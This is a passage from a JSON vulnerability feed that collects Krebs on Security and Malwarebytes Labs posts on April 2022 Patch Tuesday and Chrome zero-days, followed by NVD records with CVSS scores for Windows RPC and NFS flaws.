[CVE-2022-24491](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-24491>) and [CVE-2022-24497](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-24497>), Windows **Network File System** (NFS) vulnerabilities that also clock in at 9.8 CVSS scores and are listed as "exploitation more likely by Microsoft."\n\n"These could be the kind of vulnerabilities which appeal to ransomware operators as they provide the potential to expose critical data," said **Kevin Breen**, director of cyber threat research at **Immersive Labs**. "It is also important for security teams to note that NFS Role is not a default configuration for Windows devices."\n\nSpeaking of wormable flaws, [CVE-2022-24500](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-24500>) is a critical bug in the **Windows Server Message Block** (SMB).\n\n"This is especially poignant as we approach the anniversary of WannaCry, which famously used the EternalBlue SMB vulnerability to propagate at great pace," Breen added. "Microsoft advises blocking TCP port 445 at the perimeter firewall, which is strong advice regardless of this specific vulnerability. While this won't stop exploitation from attackers inside the local network, it will prevent new attacks originating from the Internet."\n\nIn addition, this month's patch batch from Redmond brings updates for **Exchange Server**, **Office**, **SharePoint Server**, **Windows Hyper-V**, **DNS Server**, **Skype for Business**, **.NET** and **Visual Studio**, **Windows App Store**, and **Windows Print Spooler** components.\n\nAs it generally does on the second Tuesday of each month, **Adobe** released four patches addressing 70 vulnerabilities in **Acrobat** and **Reader,** **Photoshop**, **After Effects**, and **Adobe Commerce**. More information on those updates is available [here](<https://helpx.adobe.com/security.html>).\n\nFor a complete rundown of all patches released by Microsoft today and indexed by severity and other metrics, check out the [always-useful Patch Tuesday roundup](<https://isc.sans.edu/forums/diary/Microsoft+April+2022+Patch+Tuesday/28542/>) from the **SANS Internet Storm Center**. And it\u2019s not a bad idea to hold off updating for a few days until Microsoft works out any kinks in the updates: [AskWoody.com](<https://www.askwoody.com/2022/march-madness-patching-begins/>) usually has the lowdown on any patches that may be causing problems for Windows users.\n\nAs always, please consider backing up your system or at least your important documents and data before applying system updates. And if you run into any problems with these patches, please drop a note about it here in the comments.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-13T15:01:24", "type": "krebs", "title": "Microsoft Patch Tuesday, April 2022 Edition", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-24491", "CVE-2022-24497", "CVE-2022-24500", "CVE-2022-24521", "CVE-2022-26809"], "modified": "2022-04-13T15:01:24", "id": "KREBS:4BE9D01404C10748F3DE7B41B5A18613", "href": "https://krebsonsecurity.com/2022/04/microsoft-patch-tuesday-april-2022-edition/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "malwarebytes": [{"lastseen": "2022-04-19T21:28:45", "description": "It\u2019s that time of the month again. Time to check what needs to be updated and prioritize where necessary. The Microsoft updates include at least two zero-day vulnerabilities that deserve your attention.\n\n## Microsoft\n\nMicrosoft has released security updates and non-security updates for client and server versions of its Windows operating system and other company products, including Microsoft Office and Edge.\n\nFor those that have extended support for Windows 7, there are four critical remote code execution (RCE) vulnerabilities to worry about:\n\n * [CVE-2022-24500](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-24500>) [CVSS](<https://blog.malwarebytes.com/malwarebytes-news/2020/05/how-cvss-works-characterizing-and-scoring-vulnerabilities/>) 8.8 out of 10, a Windows SMB Remote Code Execution vulnerability\n * [CVE-2022-24541](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-24541>) CVSS 8.8, a Windows Server Service Remote Code Execution vulnerability\n * [CVE-2022-26809](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-26809>) CVSS 9.8, a Remote Procedure Call Runtime Remote Code Execution vulnerability\n * [CVE-2022-26919](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-26919>) CVSS 8.1, a Windows LDAP Remote Code Execution vulnerability\n\nCVE-2022-26809 does have a CVSS of 9.8 for good reason. It affects almost every Windows OS and Microsoft has it listed as more likely to be exploited. To exploit this vulnerability, an attacker would need to send a specially crafted RPC call to an RPC host. This could result in remote code execution on the server side with the same permissions as the RPC service. TCP port 445 is used to initiate a connection with the affected component. And some quick Shodan scans showed that millions of systems have that port open.\n\n> We've learned nothing. ![\ud83e\udd74](https://s.w.org/images/core/emoji/13.1.0/72x72/1f974.png) \nCVE-2022-26809 is going to ruin some weekends.<https://t.co/mD6irwPdUs>[#CyberSecurity](<https://twitter.com/hashtag/CyberSecurity?src=hash&ref_src=twsrc%5Etfw>) [pic.twitter.com/szPhauAIrv](<https://t.co/szPhauAIrv>)\n> \n> -- Jon Gorenflo ![\ud83c\uddfa\ud83c\udde6](https://s.w.org/images/core/emoji/13.1.0/72x72/1f1fa-1f1e6.png)![\ud83c\udf3b](https://s.w.org/images/core/emoji/13.1.0/72x72/1f33b.png) (@flakpaket) [April 12, 2022](<https://twitter.com/flakpaket/status/1514029843335237636?ref_src=twsrc%5Etfw>)\n\nMicrosoft classifies a vulnerability as a zero-day if it is publicly disclosed or actively exploited with no official fix available. The zero-day vulnerabilities fixed in this update cycle are:\n\n * [CVE-2022-26904](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-26904>) CVSS 7.0, a Windows User Profile Service Elevation of Privilege (EoP) vulnerability. This one is marked with a high attack complexity, because successful exploitation of this vulnerability requires an attacker to win a race condition. But the vulnerability is public knowledge and there is an existing Metasploit module for it. Metasploit is an open-source penetrating framework used by security engineers as a penetration testing system and a development platform that allows to create security tools and exploits.\n * [CVE-2022-24521](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-24521>) CVSS 7.8, a Windows Common Log File System Driver Elevation of Privilege vulnerability. This vulnerability has been used in the wild. Microsoft says that attack complexity is low. The vulnerability was reported to Microsoft by the National Security Agency (NSA) and Crowdstrike.\n\nOther notable CVEs:\n\n * [CVE-2](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-24491>)[0](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-24491>)[22-24491](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-24491>) CVSS 9.8, a Windows Network File System Remote Code Execution vulnerability. This vulnerability is only exploitable for systems that have the [NFS role](<https://docs.microsoft.com/en-us/windows-server/storage/nfs/nfs-overview>) enabled. An attacker could send a specially crafted NFS protocol network message to a vulnerable Windows machine, which could enable remote code execution.\n * [CVE-2022-24997](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-24997>) CVSS 9.8, another Windows Network File System Remote Code Execution vulnerability. This vulnerability is only exploitable for systems that have the NFS role enabled. An attacker could send a specially crafted NFS protocol network message to a vulnerable Windows machine, which could enable remote code execution.\n\nOn these systems with the NFS role enabled, a remote attacker could execute their code with high privileges and without user interaction. This worries experts as these may turn out to be wormable bugs between NFS servers. For a temporary solution, more information on installing or uninstalling Roles or Role Services is available [here](<https://docs.microsoft.com/en-us/windows-server/administration/server-manager/install-or-uninstall-roles-role-services-or-features#install-roles-role-services-and-features-by-using-the-add-roles-and-features-wizard>).\n\nA vulnerability is considered to be wormable if an attack can be launched that requires no human interaction to spread. The impact can be considerable if the number of vulnerable machine is high enough. In these cases web application firewalls (WAFs) would help to mitigate the risk.\n\nIn related news, Microsoft [announced](<https://techcommunity.microsoft.com/t5/windows-it-pro-blog/get-current-and-stay-current-with-windows-autopatch/ba-p/3271839>) the release of Windows Autopatch, which is set for July 2022. This will hopefully lessen some of the burdens that come with [patch management](<https://www.malwarebytes.com/business/vulnerability-patch-management>).\n\n## Edge and Chrome\n\nThe Microsoft updates included 26 Microsoft Edge vulnerabilities and Google released a stable channel update for Windows, Mac, and Linux that includes 11 security fixes. Eight out of those 11 were rated with a High severity, none were marked as Critical.\n\n## Other updates\n\nWhile you're at it, we also saw updates from vendors like:\n\n * [Adobe](<https://helpx.adobe.com/security/security-bulletin.html>)\n * [Cisco](<https://tools.cisco.com/security/center/publicationListing.x>)\n * [VMWare](<https://core.vmware.com/vmsa-2022-0011-questions-answers-faq#section1>)\n\nStay safe, everyone!\n\nThe post [April's Patch Tuesday update includes fixes for two zero-day vulnerabilities](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/04/aprils-patch-tuesday-update-includes-fixes-for-two-zero-day-vulnerabilities/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-13T13:57:39", "type": "malwarebytes", "title": "April\u2019s Patch Tuesday update includes fixes for two zero-day vulnerabilities", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-24491", "CVE-2022-24500", "CVE-2022-24521", "CVE-2022-24541", "CVE-2022-24997", "CVE-2022-26809", "CVE-2022-26904", "CVE-2022-26919"], "modified": "2022-04-13T13:57:39", "id": "MALWAREBYTES:EF0C1E45728B8347B58DBE1D76A5F156", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/04/aprils-patch-tuesday-update-includes-fixes-for-two-zero-day-vulnerabilities/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-30T15:40:03", "description": "Google has [urged](<https://chromereleases.googleblog.com/2022/03/stable-channel-update-for-desktop_25.html>) its 3 billion+ users to update to Chrome version 99.0.4844.84 for Mac, Windows, and Linux to mitigate a zero-day that is currently being exploited in the wild. This is in response to a bug reported by an anonymous security researcher last week.\n\nThe flaw, which is tracked as [CVE-2022-1096](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1096>), is a "Type Confusion in V8" and is rated as high severity, meaning that it's necessary for everyone using Chrome to update as quickly as possible because of the damage attackers could cause once they exploit this.\n\nNot much is known about the vulnerability itself or how great the impact would be if exploited, but the unusual release of this patch, which notably addresses just one vulnerability, means that this update shouldn't be ignored.\n\nGoogle is always cautious to release more details until the majority of users are updated with a fix. Google says it [may take weeks](<https://chromereleases.googleblog.com/2022/03/stable-channel-update-for-desktop_25.html>) before the update reaches its entire user base.\n\n## How to update\n\nThe easiest way to update is to allow Chrome to do it automatically, which basically uses the same method I outlined below but does not require your attention. But you can end up lagging behind if you never close the browser or if something goes wrong, such as an extension stopping you from updating the browser.\n\nSo, it doesn\u2019t hurt to check now and then. And now would be a good time.\n\nMy preferred method is to have Chrome open the page **chrome://settings/help** which you can also find by clicking **Settings > About Chrome**.\n\nIf there is an update available, Chrome will notify you and start downloading it. Then it will tell you all you have to do to complete the update is relaunch the browser.\n\n## Microsoft Edge\n\nMicrosoft has [confirmed](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-1096>) that Edge, a Chromium-based browser, is also affected by this vulnerability. Edge users should urgently update their browsers to version 99.0.1150.55, which is not vulnerable to the flaw.\n\nThe post [Update now! Google releases emergency patch for Chrome zero-day used in the wild](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/03/update-now-google-releases-emergency-patch-for-chrome-zero-day-used-in-the-wild/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {}, "published": "2022-03-28T13:42:54", "type": "malwarebytes", "title": "Update now! Google releases emergency patch for Chrome zero-day used in the wild", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2022-1096"], "modified": "2022-03-28T13:42:54", "id": "MALWAREBYTES:3203C761121FB47FC676CC2505B4A9FD", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/03/update-now-google-releases-emergency-patch-for-chrome-zero-day-used-in-the-wild/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-09-06T00:03:08", "description": "On Friday, Google [announced](<https://chromereleases.googleblog.com/2022/09/stable-channel-update-for-desktop.html>) the release of a new version of its Chrome browser that includes a security fix for a zero-day tracked as [CVE-2022-3075](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3075>). As with previous announcements, technical details about the vulnerability won't be released until a certain number of Chrome users have already applied the patch.\n\nGoogle is urging its Windows, Mac, and Linux users to update Chrome to version** 105.0.5195.102**.\n\nCVE-2022-3075 is described as an \"[i]nsufficient data validation in Mojo\". According to Chromium documents, Mojo is \"a collection of runtime libraries" that facilitates interfacing standard, low-level interprocess communication (IPC) primitives. Mojo provides a platform-agnostic abstraction of these primitives, which comprise most of Chrome's code.\n\nAn anonymous security researcher is credited for discovering and reporting the flaw.\n\nCVE-2022-3075 is the sixth zero-day Chrome vulnerability Google had to address. The previous ones were:\n\n * [C](<https://thehackernews.com/2022/02/new-chrome-0-day-bug-under-active.html>)[VE-2022-0609](<https://thehackernews.com/2022/02/new-chrome-0-day-bug-under-active.html>), a Use-after-Free (UAF) vulnerability, which was patched in February\n * [CVE-2022-1096](<https://www.malwarebytes.com/blog/news/2022/03/update-now-google-releases-emergency-patch-for-chrome-zero-day-used-in-the-wild>), a \"Type Confusion in V8\" vulnerability, which was patched in March\n * [CVE-2022-1364](<https://www.bleepingcomputer.com/news/security/google-chrome-emergency-update-fixes-zero-day-used-in-attacks/>), a flaw in the V8 JavaScript engine, which was patched in April\n * [CVE-2022-2294](<https://www.malwarebytes.com/blog/news/2022/07/update-now-chrome-patches-another-zero-day-vulnerability>), a flaw in the Web Real-Time Communications (WebRTC), which was patched in July\n * [CVE-2022-2856](<https://www.malwarebytes.com/blog/news/2022/08/update-chrome-now-google-issues-patch-for-zero-day-spotted-in-the-wild>), an insufficient input validation flaw, which was patched in August\n\nGoogle Chrome needs minimum oversight as it updates automatically. However, if you're in the habit of not closing your browser or have extensions that may hinder Chrome from automatically doing this, please check your browser every now and then.\n\nOnce Chrome notifies you of an available update, don't hesitate to download it. The patch is applied once you relaunch the browser.\n\n![](https://www.malwarebytes.com/blog/news/2022/09/easset_upload_file63727_234723_e.png)\n\nStay safe!", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-09-05T16:30:00", "type": "malwarebytes", "title": "Zero-day puts a dent in Chrome's mojo", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2022-1096", "CVE-2022-1364", "CVE-2022-2294", "CVE-2022-2856", "CVE-2022-3075"], "modified": "2022-09-05T16:30:00", "id": "MALWAREBYTES:08FDD3DEF41B63F1DEB23C21DCFDB12D", "href": "https://www.malwarebytes.com/blog/news/2022/09/update-chrome-asap-a-new-zero-day-is-already-being-exploited", "cvss": {"score": 0.0, "vector": "NONE"}}], "cve": [{"lastseen": "2023-05-27T14:34:08", "description": "Remote Procedure Call Runtime Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2022-24492, CVE-2022-24528.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-15T19:15:00", "type": "cve", "title": "CVE-2022-26809", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-24492", "CVE-2022-24528", "CVE-2022-26809"], "modified": "2022-04-19T18:37:00", "cpe": ["cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_server_2022:-", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_server_2008:*", "cpe:/o:microsoft:windows_10:21h2", "cpe:/o:microsoft:windows_10:21h1", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_11:-", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_server_2012:-"], "id": "CVE-2022-26809", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-26809", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:*:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2022:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:*:*"]}, {"lastseen": "2023-05-27T14:27:58", "description": "Remote Procedure Call Runtime Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2022-24492, CVE-2022-26809.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-04-15T19:15:00", "type": "cve", "title": "CVE-2022-24528", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-24492", "CVE-2022-24528", "CVE-2022-26809"], "modified": "2022-04-21T20:49:00", "cpe": ["cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_server_2022:-", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_server_2008:*", "cpe:/o:microsoft:windows_10:21h2", "cpe:/o:microsoft:windows_10:21h1", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_11:-", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_server_2012:-"], "id": "CVE-2022-24528", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-24528", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:*:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2022:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:*:*"]}, {"lastseen": "2023-05-27T14:27:53", "description": "Remote Procedure Call Runtime Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2022-24528, CVE-2022-26809.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-04-15T19:15:00", "type": "cve", "title": "CVE-2022-24492", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-24492", "CVE-2022-24528", "CVE-2022-26809"], "modified": "2022-04-19T17:31:00", "cpe": ["cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_server_2022:-", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_server_2008:*", "cpe:/o:microsoft:windows_10:21h2", "cpe:/o:microsoft:windows_10:21h1", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_11:-", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_server_2012:-"], "id": "CVE-2022-24492", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-24492", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:*:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2022:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:*:*"]}, {"lastseen": "2023-05-27T14:28:00", "description": "Windows Network File System Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2022-24491.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-15T19:15:00", "type": "cve", "title": "CVE-2022-24497", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, 